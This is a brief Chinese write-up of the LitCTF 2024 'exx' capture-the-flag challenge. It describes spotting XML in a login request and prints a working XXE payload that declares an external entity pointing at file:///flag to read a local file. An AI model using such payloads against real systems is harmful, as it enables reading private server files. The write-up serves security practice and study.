NSS [LitCTF 2024]exx

开题，是个登陆界面

抓包看看，xml格式，猜测是XXE。

直接最简单的payload打通了

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE data [
  <!ENTITY xxe SYSTEM "file:///flag">     
]>
<user><username>
&xxe;                                                    
</username><password>123456</password></user>